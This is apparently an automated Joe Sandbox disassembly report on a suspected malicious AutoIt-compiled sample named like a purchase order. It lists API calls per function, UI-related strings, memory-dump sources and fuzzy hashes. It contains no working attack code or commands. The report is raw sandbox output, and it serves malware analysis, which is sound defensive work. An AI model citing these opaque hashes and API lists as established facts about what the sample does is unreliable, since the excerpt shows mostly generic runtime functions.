                          • DeleteObject.GDI32(00000000), ref: 00F82B43
                          • DestroyWindow.USER32 ref: 00F82B52
                          • GetDesktopWindow.USER32 ref: 00F82B6D
                          • GetWindowRect.USER32(00000000), ref: 00F82B74
                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F82CA3
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F82CB1
                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82CF8
                          • GetClientRect.USER32(00000000,?), ref: 00F82D04
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F82D40
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D62
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D75
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D80
                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D89
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D98
                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DA1
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DA8
                          • GlobalFree.KERNEL32(00000000), ref: 00F82DB3
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DC5
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F9FC38,00000000), ref: 00F82DDB
                          • GlobalFree.KERNEL32(00000000), ref: 00F82DEB
                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F82E11
                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F82E30
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82E52
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F8303F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: 473f70f0e18912746da4ed97151ac69b556198953badc84c55dd6bd7da0017b0
                          • Instruction ID: 8968e4bab8e181b6a10411befb33cff39065c36126de43ea9af162b450048a97
                          • Opcode Fuzzy Hash: 473f70f0e18912746da4ed97151ac69b556198953badc84c55dd6bd7da0017b0
                          • Instruction Fuzzy Hash: D0027F71A00208AFDB14DF64CC89EAE7BB9FF49714F048159F915AB2A1C774ED41EBA0
                          Function 00F970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00F9712F
                          • GetSysColorBrush.USER32(0000000F), ref: 00F97160
                          • GetSysColor.USER32(0000000F), ref: 00F9716C
                          • SetBkColor.GDI32(?,000000FF), ref: 00F97186
                          • SelectObject.GDI32(?,?), ref: 00F97195
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00F971C0
                          • GetSysColor.USER32(00000010), ref: 00F971C8
                          • CreateSolidBrush.GDI32(00000000), ref: 00F971CF
                          • FrameRect.USER32(?,?,00000000), ref: 00F971DE
                          • DeleteObject.GDI32(00000000), ref: 00F971E5
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00F97230
                          • FillRect.USER32(?,?,?), ref: 00F97262
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F97284
                            • Part of subcall function 00F973E8: GetSysColor.USER32(00000012), ref: 00F97421
                            • Part of subcall function 00F973E8: SetTextColor.GDI32(?,?), ref: 00F97425
                            • Part of subcall function 00F973E8: GetSysColorBrush.USER32(0000000F), ref: 00F9743B
                            • Part of subcall function 00F973E8: GetSysColor.USER32(0000000F), ref: 00F97446
                            • Part of subcall function 00F973E8: GetSysColor.USER32(00000011), ref: 00F97463
                            • Part of subcall function 00F973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97471
                            • Part of subcall function 00F973E8: SelectObject.GDI32(?,00000000), ref: 00F97482
                            • Part of subcall function 00F973E8: SetBkColor.GDI32(?,00000000), ref: 00F9748B
                            • Part of subcall function 00F973E8: SelectObject.GDI32(?,?), ref: 00F97498
                            • Part of subcall function 00F973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00F974B7
                            • Part of subcall function 00F973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F974CE
                            • Part of subcall function 00F973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00F974DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                          • String ID:
                          • API String ID: 4124339563-0
                          • Opcode ID: 1e2bad5fea9eb15a0c3df20467187172f62b2f144dbbacd12fbc6097b04fe415
                          • Instruction ID: fda7c6cf653d9211bf84de43b5bd8c93ed3a1e69233ddbf8682bd077e743283c
                          • Opcode Fuzzy Hash: 1e2bad5fea9eb15a0c3df20467187172f62b2f144dbbacd12fbc6097b04fe415
                          • Instruction Fuzzy Hash: F2A1B272418305BFEB10AF60DC48E5B7BA9FF89320F140A1AF962961E1D731E944EF91
                          Function 00F18D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00F18E14
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F56AC5
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F56AFE
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F56F43
                            • Part of subcall function 00F18F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F18BE8,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18FC5
                          • SendMessageW.USER32(?,00001053), ref: 00F56F7F
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F56F96
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F56FAC
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F56FB7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 2760611726-4108050209
                          • Opcode ID: 7a17d92f6dbea6cb112b8d255993bca802abc05d728bdedb90a4c40af3d4403c
                          • Instruction ID: a2f57a3843b27e87fafbaf05ae0a02ffd1c39593e7e328789aae7e2be1be1642
                          • Opcode Fuzzy Hash: 7a17d92f6dbea6cb112b8d255993bca802abc05d728bdedb90a4c40af3d4403c
                          • Instruction Fuzzy Hash: 6D12B030A01201EFD725DF24C954BA5BBF1FB44312F944469FAA5CB262CB31AC96FB91
                          Function 00F82711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00F8273E
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F8286A
                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F828A9
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F828B9
                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F82900
                          • GetClientRect.USER32(00000000,?), ref: 00F8290C
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F82955
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F82964
                          • GetStockObject.GDI32(00000011), ref: 00F82974
                          • SelectObject.GDI32(00000000,00000000), ref: 00F82978
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F82988
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F82991
                          • DeleteDC.GDI32(00000000), ref: 00F8299A
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F829C6
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F829DD
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F82A1D
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F82A31
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F82A42
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F82A77
                          • GetStockObject.GDI32(00000011), ref: 00F82A82
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F82A8D
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F82A97
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: f65a1123e15367059b591e848d5d2e24c9d51041f1cd49428f105bab21539f1c
                          • Instruction ID: 37ff2ed1ff8686d5c49bdd85af44a730a8840cf243295ba86dab682fe5a6069c
                          • Opcode Fuzzy Hash: f65a1123e15367059b591e848d5d2e24c9d51041f1cd49428f105bab21539f1c
                          • Instruction Fuzzy Hash: 4DB14B71A00219AFEB14DFA8DC4AFAE7BA9FB48710F004155FA15E72D0D774AD40EBA4
                          Function 00F74ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F74AED
                          • GetDriveTypeW.KERNEL32(?,00F9CB68,?,\\.\,00F9CC08), ref: 00F74BCA
                          • SetErrorMode.KERNEL32(00000000,00F9CB68,?,\\.\,00F9CC08), ref: 00F74D36
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 9fc6180962e49521bc67761bf73c44ae303bf9eba517271b06f58c85ab516374
                          • Instruction ID: ef2b4fef439cc2b0981707db3a860acf3bfa82383a24f336efdd685b3731ebca
                          • Opcode Fuzzy Hash: 9fc6180962e49521bc67761bf73c44ae303bf9eba517271b06f58c85ab516374
                          • Instruction Fuzzy Hash: A1618332A091069BCB15DF18CA82E6977A0AF44315B24C41BF80AEB6D2DB75FD41FB53
                          Function 00F973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00F97421
                          • SetTextColor.GDI32(?,?), ref: 00F97425
                          • GetSysColorBrush.USER32(0000000F), ref: 00F9743B
                          • GetSysColor.USER32(0000000F), ref: 00F97446
                          • CreateSolidBrush.GDI32(?), ref: 00F9744B
                          • GetSysColor.USER32(00000011), ref: 00F97463
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97471
                          • SelectObject.GDI32(?,00000000), ref: 00F97482
                          • SetBkColor.GDI32(?,00000000), ref: 00F9748B
                          • SelectObject.GDI32(?,?), ref: 00F97498
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00F974B7
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F974CE
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F974DB
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F9752A
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F97554
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00F97572
                          • DrawFocusRect.USER32(?,?), ref: 00F9757D
                          • GetSysColor.USER32(00000011), ref: 00F9758E
                          • SetTextColor.GDI32(?,00000000), ref: 00F97596
                          • DrawTextW.USER32(?,00F970F5,000000FF,?,00000000), ref: 00F975A8
                          • SelectObject.GDI32(?,?), ref: 00F975BF
                          • DeleteObject.GDI32(?), ref: 00F975CA
                          • SelectObject.GDI32(?,?), ref: 00F975D0
                          • DeleteObject.GDI32(?), ref: 00F975D5
                          • SetTextColor.GDI32(?,?), ref: 00F975DB
                          • SetBkColor.GDI32(?,?), ref: 00F975E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 6f191a45c6558907378ea1bbd28032e9fb7929b1432c673efe47657076f764c9
                          • Instruction ID: dc4a26fbfa779608e280f4fd51365a1ef2f79f5b9e9884523bf55b85e178bc63
                          • Opcode Fuzzy Hash: 6f191a45c6558907378ea1bbd28032e9fb7929b1432c673efe47657076f764c9
                          • Instruction Fuzzy Hash: 94616E72D00218AFEF119FA4DC49EEE7FB9EB08320F154116F915AB2A1D7759940EF90
                          Function 00F90FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00F91128
                          • GetDesktopWindow.USER32 ref: 00F9113D
                          • GetWindowRect.USER32(00000000), ref: 00F91144
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F91199
                          • DestroyWindow.USER32(?), ref: 00F911B9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F911ED
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F9120B
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F9121D
                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00F91232
                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00F91245
                          • IsWindowVisible.USER32(00000000), ref: 00F912A1
                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00F912BC
                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00F912D0
                          • GetWindowRect.USER32(00000000,?), ref: 00F912E8
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00F9130E
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00F91328
                          • CopyRect.USER32(?,?), ref: 00F9133F
                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00F913AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 42f2e417bc7f6ed67c69cef014c74418736520c18d131cd6cb441c829f7e82c1
                          • Instruction ID: 485714efd13273c87e5b8e7e85e7dfb7b0b3b6bcd430f9c9c09cce2acb7903aa
                          • Opcode Fuzzy Hash: 42f2e417bc7f6ed67c69cef014c74418736520c18d131cd6cb441c829f7e82c1
                          • Instruction Fuzzy Hash: 2AB18F71608341AFEB14DF64CC84B6ABBE4FF88354F008919F9999B2A1C771EC44EB91
                          Function 00F18891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F18968
                          • GetSystemMetrics.USER32(00000007), ref: 00F18970
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F1899B
                          • GetSystemMetrics.USER32(00000008), ref: 00F189A3
                          • GetSystemMetrics.USER32(00000004), ref: 00F189C8
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F189E5
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F189F5
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F18A28
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F18A3C
                          • GetClientRect.USER32(00000000,000000FF), ref: 00F18A5A
                          • GetStockObject.GDI32(00000011), ref: 00F18A76
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F18A81
                            • Part of subcall function 00F1912D: GetCursorPos.USER32(?), ref: 00F19141
                            • Part of subcall function 00F1912D: ScreenToClient.USER32(00000000,?), ref: 00F1915E
                            • Part of subcall function 00F1912D: GetAsyncKeyState.USER32(00000001), ref: 00F19183
                            • Part of subcall function 00F1912D: GetAsyncKeyState.USER32(00000002), ref: 00F1919D
                          • SetTimer.USER32(00000000,00000000,00000028,00F190FC), ref: 00F18AA8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: 933ffacf3229792c312b5a9d8e75e04a3bbd73db02267e28d84fea12e8e29e4b
                          • Instruction ID: 69acc854a6dda93e1e7c6a468c3e36cf168412bf0b8dc7de98d12731f9a496b0
                          • Opcode Fuzzy Hash: 933ffacf3229792c312b5a9d8e75e04a3bbd73db02267e28d84fea12e8e29e4b
                          • Instruction Fuzzy Hash: D1B18E31A00209AFDB14DFA8DD55BEE3BB5FB48325F14421AFA15E7290DB34E841EB91
                          Function 00F60D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                            • Part of subcall function 00F610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                            • Part of subcall function 00F610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                            • Part of subcall function 00F610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F60DF5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F60E29
                          • GetLengthSid.ADVAPI32(?), ref: 00F60E40
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00F60E7A
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F60E96
                          • GetLengthSid.ADVAPI32(?), ref: 00F60EAD
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F60EB5
                          • HeapAlloc.KERNEL32(00000000), ref: 00F60EBC
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F60EDD
                          • CopySid.ADVAPI32(00000000), ref: 00F60EE4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F60F13
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F60F35
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F60F47
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F6E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F75
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F7E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F85
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F8E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F95
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F60FA1
                          • HeapFree.KERNEL32(00000000), ref: 00F60FA8
                            • Part of subcall function 00F61193: GetProcessHeap.KERNEL32(00000008,00F60BB1,?,00000000,?,00F60BB1,?), ref: 00F611A1
                            • Part of subcall function 00F61193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F60BB1,?), ref: 00F611A8
                            • Part of subcall function 00F61193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F60BB1,?), ref: 00F611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: e7b7f4984f324ee7edcb3ca2f0317157f1a65d7fa42002a3ab75f21c76796237
                          • Instruction ID: ecc790be62444d4ef30713217d3a44df513f342d5acce6449526e17840cf55e2
                          • Opcode Fuzzy Hash: e7b7f4984f324ee7edcb3ca2f0317157f1a65d7fa42002a3ab75f21c76796237
                          • Instruction Fuzzy Hash: D4716A7290021AABDF219FA5DC48FAFBBB8FF15310F144116F919E6191DB319A05EBA0
                          Function 00F8C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C4BD
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F9CC08,00000000,?,00000000,?,?), ref: 00F8C544
                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F8C5A4
                          • _wcslen.LIBCMT ref: 00F8C5F4
                          • _wcslen.LIBCMT ref: 00F8C66F
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F8C6B2
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F8C7C1
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F8C84D
                          • RegCloseKey.ADVAPI32(?), ref: 00F8C881
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8C88E
